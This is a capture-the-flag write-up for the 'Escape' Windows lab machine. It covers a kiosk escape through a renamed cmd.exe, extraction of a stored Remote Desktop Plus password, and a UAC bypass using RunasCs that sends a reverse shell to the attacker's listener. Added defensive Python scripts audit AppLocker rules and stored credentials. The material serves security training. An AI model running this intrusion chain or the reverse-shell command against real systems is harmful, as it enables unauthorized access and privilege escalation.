Escape is an easy Windows machine created by xct and kozie. It involves Kiosk escape, capturing a password from an encrypted RDP profile, and bypassing UAC.

NMAP

PORT     STATE SERVICE
3389/tcp open ms-wbt-server

From the NMAP scan, we see just one port open, which is RDP.

RDP

We don't have any credentials, but we can try to RDP without providing any and with NLA (Network Level Authentication) security disabled:

➜  xfreerdp /v:10.10.103.87 /size:1280x720 /tls-seclevel:0 -sec-nla

We are presented with a conference display screen and a message saying we can log in as KioskUser0 without a password.
Indeed, we get in and find ourselves inside kiosk mode, a feature used to limit what a user can do on a machine.

Kiosk Escape

So our goal is to escape this mode and get full access to the machine. If we search for kiosk mode escape, we can find this article that talks about it.
An easy way to escape is to press the Windows key, search for msedge and start it; then, from the search bar, we can type file:///C:/ and browse the C drive.
Now we can navigate to C:/Windows/System32/, click on cmd.exe, and it will be downloaded.
After that, we can open the Downloads folder and find it there. However, if we try to open it, the following message appears: This operation has been canceled due to system limitations. Contact your system administrator.
This restriction comes from kiosk mode, which only allows Microsoft Edge to run. So, what if we rename cmd.exe to msedge?
It launches cmd.exe. That's because AppLocker is only checking the file name instead of the full path.
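The weakness above is an allow rule keyed on a bare file name. As an added example (not part of the original writeup), the script below audits an AppLocker policy export for exactly that pattern; the policy XML is constructed to mirror the behaviour observed on the box, not exported from it, and a real policy would come from Get-AppLockerPolicy -Effective -Xml.

```python
"""Flag AppLocker Allow rules that match on a file name only, e.g.
Path="*\\msedge.exe": such a rule lets any file named msedge.exe run from
anywhere, which is why a renamed cmd.exe slipped through on this box.
Constructed sample policy below; not exported from a real machine.
"""
import re
import xml.etree.ElementTree as ET

# Constructed sample: one name-only Allow rule (weak), one Allow rule anchored
# to a directory, and one Deny rule (Deny rules are not the problem here).
SAMPLE_POLICY = """<AppLockerPolicy Version="1">
  <RuleCollection Type="Exe" EnforcementMode="Enabled">
    <FilePathRule Id="r1" Name="Allow Edge by name" Action="Allow" UserOrGroupSid="S-1-1-0">
      <Conditions><FilePathCondition Path="*\\msedge.exe"/></Conditions>
    </FilePathRule>
    <FilePathRule Id="r2" Name="Allow Program Files" Action="Allow" UserOrGroupSid="S-1-1-0">
      <Conditions><FilePathCondition Path="%PROGRAMFILES%\\*"/></Conditions>
    </FilePathRule>
    <FilePathRule Id="r3" Name="Deny cmd" Action="Deny" UserOrGroupSid="S-1-1-0">
      <Conditions><FilePathCondition Path="%SYSTEM32%\\cmd.exe"/></Conditions>
    </FilePathRule>
  </RuleCollection>
</AppLockerPolicy>"""

# A path that is just a wildcard followed by a file name pins nothing about
# the directory, so the rule effectively matches on the name alone.
NAME_ONLY = re.compile(r"^\*\\[^\\*?]+\.[A-Za-z0-9]+$")


def name_only_allow_rules(policy_xml: str) -> list:
    """Return (rule name, path) for every Allow path rule keyed on a file name."""
    root = ET.fromstring(policy_xml)
    weak = []
    for rule in root.iter("FilePathRule"):
        if rule.get("Action") != "Allow":
            continue
        for cond in rule.iter("FilePathCondition"):
            path = cond.get("Path", "")
            if NAME_ONLY.match(path):
                weak.append((rule.get("Name"), path))
    return weak


if __name__ == "__main__":
    for name, path in name_only_allow_rules(SAMPLE_POLICY):
        print(f"weak rule '{name}': {path} matches by file name only; "
              "anchor it to a directory or use a publisher rule instead")
```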

User

Now that we’ve escaped the Kiosk mode and have command prompt running, we can grab our user flag.

C:\Users\kioskUser0\Desktop>dir
The system cannot find message text for message number 0x235e in the message file for Application.
The system cannot find message text for message number 0x235b in the message file for Application.

DNS bad key.
02/04/2024 02:15 AM The system cannot find message text for message number 0x2373 in the message file for Application.
.
02/04/2024 02:15 AM The system cannot find message text for message number 0x2373 in the message file for Application.
..
02/03/2024 04:47 AM 2,352 Microsoft Edge.lnk
02/03/2024 04:48 AM 36 user_07eb46.txt
The system cannot find message text for message number 0x2378 in the message file for Application.
The system cannot find message text for message number 0x2379 in the message file for Application.

C:\Users\kioskUser0\Desktop>type user_07eb46.txt
VL{REDACTED}

As you can see, the command prompt is throwing errors. To get rid of them, we can spawn PowerShell, and all those errors disappear.

C:\Users\kioskUser0\Desktop>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell <https://aka.ms/pscore6>

PS C:\Users\kioskUser0\Desktop> ls

Directory: C:\Users\kioskUser0\Desktop

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/3/2024 3:47 AM 2352 Microsoft Edge.lnk
-a---- 2/3/2024 3:48 AM 36 user_07eb46.txt

PrivEsc

In C:\, we can see a folder called _admin:

PS C:\> cmd /c dir /A
Volume in drive C has no label.
Volume Serial Number is 4A4B-52B4

Directory of C:\

02/04/2024 01:52 AM <DIR> $Recycle.Bin
02/03/2024 10:36 AM <DIR> $WinREAgent
02/03/2024 12:32 PM <JUNCTION> Documents and Settings [C:\Users]
02/04/2024 02:35 AM 8,192 DumpStack.log
05/28/2024 10:32 AM 8,192 DumpStack.log.tmp
05/28/2024 10:32 AM 418,598,912 hiberfil.sys
02/03/2024 04:11 AM <DIR> inetpub
05/28/2024 10:32 AM 1,207,959,552 pagefile.sys
12/07/2019 02:14 AM <DIR> PerfLogs
02/03/2024 07:03 AM <DIR> Program Files
02/03/2024 04:03 AM <DIR> Program Files (x86)
02/04/2024 02:02 AM <DIR> ProgramData
05/28/2024 10:33 AM <DIR> Recovery
05/28/2024 10:32 AM 16,777,216 swapfile.sys
02/03/2024 03:32 AM <DIR> System Volume Information
02/03/2024 04:43 AM <DIR> Users
05/28/2024 10:35 AM <DIR> Windows
02/03/2024 04:05 AM <DIR> _admin
5 File(s) 1,643,352,064 bytes
13 Dir(s) 6,637,834,240 bytes free

Inside it, we find a file called profiles.xml related to Remote Desktop Plus.

PS C:\> cd .\_admin\
PS C:\_admin> ls

Directory: C:\_admin

Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/3/2024 3:04 AM installers
d----- 2/3/2024 3:05 AM passwords
d----- 2/3/2024 3:05 AM temp
-a---- 2/3/2024 3:03 AM 0 Default.rdp
-a---- 2/3/2024 3:04 AM 574 profiles.xml

PS C:\_admin> cat .\profiles.xml
<?xml version="1.0" encoding="utf-16"?>
<!-- Remote Desktop Plus -->
<Data>
<Profile>
<ProfileName>admin</ProfileName>
<UserName>127.0.0.1</UserName>
<Password>JWqkl6IDfQxXXmiHIKIP8ca0G9XxnWQZgvtPgON2vWc=</Password>
<Secure>False</Secure>
</Profile>
</Data>
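A stored profile like this is something a defender wants to find across a fleet. As an added example (not from the writeup), the script below parses a Remote Desktop Plus export in the layout shown above and reports every profile that carries a stored password; the export is constructed with a placeholder password blob, and since the writeup does not describe how the blob is encrypted, the script only reports where credentials sit and whether the profile is flagged Secure.

```python
"""Find Remote Desktop Plus profiles that carry a stored password.
The export below is constructed in the layout of profiles.xml: UTF-16 with a
BOM, as its declaration says. The <Password> value is a placeholder blob.
"""
import xml.etree.ElementTree as ET

SAMPLE_EXPORT = """<?xml version="1.0" encoding="utf-16"?>
<!-- Remote Desktop Plus -->
<Data>
<Profile>
<ProfileName>admin</ProfileName>
<UserName>127.0.0.1</UserName>
<Password>PLACEHOLDER_BASE64_BLOB=</Password>
<Secure>False</Secure>
</Profile>
<Profile>
<ProfileName>jumphost</ProfileName>
<UserName>ops</UserName>
<Password></Password>
<Secure>True</Secure>
</Profile>
</Data>
""".encode("utf-16")  # str.encode("utf-16") prepends the BOM, like the real file


def stored_credentials(export: bytes) -> list:
    """Return one dict per profile whose <Password> element is non-empty."""
    # Hand the parser the raw bytes so the BOM and the utf-16 declaration
    # are honoured rather than second-guessed.
    root = ET.fromstring(export)
    findings = []
    for prof in root.iter("Profile"):
        password = (prof.findtext("Password") or "").strip()
        if not password:
            continue
        findings.append({
            "profile": prof.findtext("ProfileName"),
            "user": prof.findtext("UserName"),
            "secure": (prof.findtext("Secure") or "").strip().lower() == "true",
        })
    return findings


if __name__ == "__main__":
    for f in stored_credentials(SAMPLE_EXPORT):
        flag = "" if f["secure"] else " (Secure=False)"
        print(f"profile {f['profile']!r} stores a password for {f['user']!r}{flag}")
```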

We can find the actual Remote Desktop Plus program inside C:\Program Files (x86)\Remote Desktop Plus.

PS C:\> cd '.\Program Files (x86)\'
PS C:\Program Files (x86)> ls

Directory: C:\Program Files (x86)

Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/7/2019 1:31 AM Common Files
d----- 2/3/2024 3:07 AM Internet Explorer
d----- 2/3/2024 3:14 AM Microsoft
d----- 12/7/2019 1:31 AM Microsoft.NET
d----- 2/3/2024 3:03 AM Remote Desktop Plus
d----- 2/3/2024 3:07 AM Windows Defender
d----- 2/3/2024 3:07 AM Windows Mail
d----- 2/3/2024 3:07 AM Windows Media Player
d----- 12/7/2019 1:54 AM Windows Multimedia Platform
d----- 12/7/2019 1:50 AM Windows NT
d----- 2/3/2024 3:07 AM Windows Photo Viewer
d----- 12/7/2019 1:54 AM Windows Portable Devices
d----- 12/7/2019 1:31 AM WindowsPowerShell

PS C:\Program Files (x86)> cd '.\Remote Desktop Plus\'
PS C:\Program Files (x86)\Remote Desktop Plus> ls

Directory: C:\Program Files (x86)\Remote Desktop Plus

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/13/2018 10:47 PM 267264 rdp.exe

Let's start Remote Desktop Plus and load the profiles.xml file into it by going to Manage profiles -> Import and export -> Import profiles. You'll need to place profiles.xml in the Downloads folder, since that's the only location from which we can load files. Now we can capture the password from memory using a tool called BulletsPassView: we just need to start the tool once the profile has been loaded into the RDP program, and it immediately reveals the password.
This is the password of the admin user, who is in the Administrators group.

PS C:\Users\kioskUser0\Downloads> net user admin
User name admin
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 2/3/2024 3:45:01 AM
Password expires Never
Password changeable 2/3/2024 3:45:01 AM
Password required No
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 2/3/2024 5:30:47 AM

Logon hours allowed All

Local Group Memberships *Administrators
Global Group memberships *None
The command completed successfully.

Now that we have the password, we can use runas to spawn a command prompt as the admin user:

PS C:\Users\kioskUser0\Downloads> runas /user:admin cmd
Enter the password for admin:
Attempting to start cmd as user "ESCAPE\admin" ...

UAC Bypass

Although the user is in the Administrators group, this shell has hardly any privileges, and that's because of UAC: a non-elevated process runs with a filtered token from which the administrative privileges have been stripped.

C:\Windows\system32>whoami
escape\admin

C:\Windows\system32>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled

To bypass UAC, we can use RunasCs.exe with the --bypass-uac flag:

PS C:\Users\kioskUser0\Downloads> .\r.exe admin <REDACTED> -r 10.8.0.210:1337 cmd --bypass-uac

[+] Running in session 2 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: WinSta0\Default
[+] Async process 'C:\Windows\system32\cmd.exe' with pid 1376 created in background.

As you can see, we got a shell as the admin user with all privileges:

➜  nc -nlvp 1337
Listening on 0.0.0.0 1337
Connection received on 10.10.103.87 51648
Microsoft Windows [Version 10.0.19045.3996]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
========================================= ================================================================== ========
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled
SeLoadDriverPrivilege Load and unload device drivers Disabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Disabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Disabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Disabled
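The difference between the filtered listing in the UAC Bypass section and the elevated listing above is the whole story of UAC's split token. As an added example (not from the writeup), the script below parses two whoami /priv listings and reports which privileges exist only in the elevated token and which were merely switched from Disabled to Enabled; the two listings are constructed excerpts in the same table layout, and pasting in the full outputs gives the same kind of report.

```python
"""Diff two `whoami /priv` listings: what UAC's filtered token withheld
and what elevation switched on. Constructed excerpts below.
"""
import re

FILTERED = """Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
"""

ELEVATED = """Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Enabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Enabled
SeDebugPrivilege              Debug programs                       Disabled
SeBackupPrivilege             Back up files and directories        Disabled
"""

# One table row: privilege name, free-text description, then the State column.
ROW = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)$")


def parse_privs(listing: str) -> dict:
    """Map privilege name -> True if its State is Enabled, False if Disabled."""
    privs = {}
    for line in listing.splitlines():
        m = ROW.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(2) == "Enabled"
    return privs


def token_diff(filtered: str, elevated: str) -> dict:
    """Privileges present only in the elevated token, and ones it turned on."""
    low, high = parse_privs(filtered), parse_privs(elevated)
    return {
        "only_when_elevated": sorted(set(high) - set(low)),
        "newly_enabled": sorted(p for p in low if p in high and high[p] and not low[p]),
    }


if __name__ == "__main__":
    report = token_diff(FILTERED, ELEVATED)
    print("withheld by UAC:", ", ".join(report["only_when_elevated"]))
    print("enabled after elevation:", ", ".join(report["newly_enabled"]))
```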

Now we can grab the root flag:

C:\Windows\system32>cd C:\users\administrator\desktop

C:\Users\Administrator\Desktop>type root.txt
VL{REDACTED}

That concludes this box. I hope you learned something new! 🐱